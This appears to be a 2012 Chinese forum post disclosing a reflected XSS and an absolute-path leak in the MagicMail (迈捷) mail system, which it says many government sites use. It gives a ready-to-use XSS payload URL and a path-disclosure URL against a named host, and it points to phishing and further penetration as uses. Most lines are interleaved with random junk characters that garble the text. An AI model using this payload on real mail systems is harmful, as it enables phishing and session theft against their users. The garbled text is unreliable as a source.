今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( j) F2 \: J4 o& ]7 O* g0 c- g2 v# s5 C0 `. T5 B
, R1 X9 V8 e) I5 `% y9 J9 y, s包含 一个反射性XSS 以及 绝对路径泄漏
. L; M( T& i0 N' _% @看了看 貌似全部是linux的。
/ K$ x0 {; J" D$ R6 e" b
$ m) Q1 L# e0 E+ v- e! _关键字:迈捷邮件系统 by MagicMail6 O) w6 y8 f% @8 g' J! L
& U7 ^1 ?/ l, {6 ?
可以看到很多政府网站都用这个邮件系统
3 l4 h& |7 D; F& q, w7 T) v, ?( H' p- D8 _0 P. t9 w7 N8 e8 _
绝对路径 http://madman.in/index.php?login_type=declare&language=: M4 v' v$ t" t2 A5 T
8 P( c& w" Y4 W" S
6 X* @# i+ p4 l* f9 d% p
) ^" X% e% m% u8 q4 F* tXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E5 ~% r D# v8 Z8 ]( L) U
& g* A) V y W& C4 w: D4 Q* w" D( C
% ^5 r9 _" j) z8 I. X$ @/ C9 `8 ?; a6 O' I6 y8 [6 F0 f8 c" U
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ i/ r6 {' y& n% a/ N& G! y
6 I3 v$ U& a h1 K2 V1 l1 z修复方案:看官方补丁吧。6 \! J c, K& M' m3 q
|
发表于 2012-11-9 20:38:41
收藏
支持
反对